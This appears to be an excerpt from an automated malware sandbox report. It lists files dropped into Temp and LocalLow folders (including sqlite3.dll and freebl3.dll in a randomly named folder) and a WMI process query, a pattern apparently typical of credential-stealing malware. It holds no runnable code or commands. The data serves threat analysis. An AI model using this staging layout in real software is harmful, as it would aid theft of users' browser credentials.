file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\sqlite3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\ucrtbase.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-datetime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-handle-l1-1-0.dll |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2760) |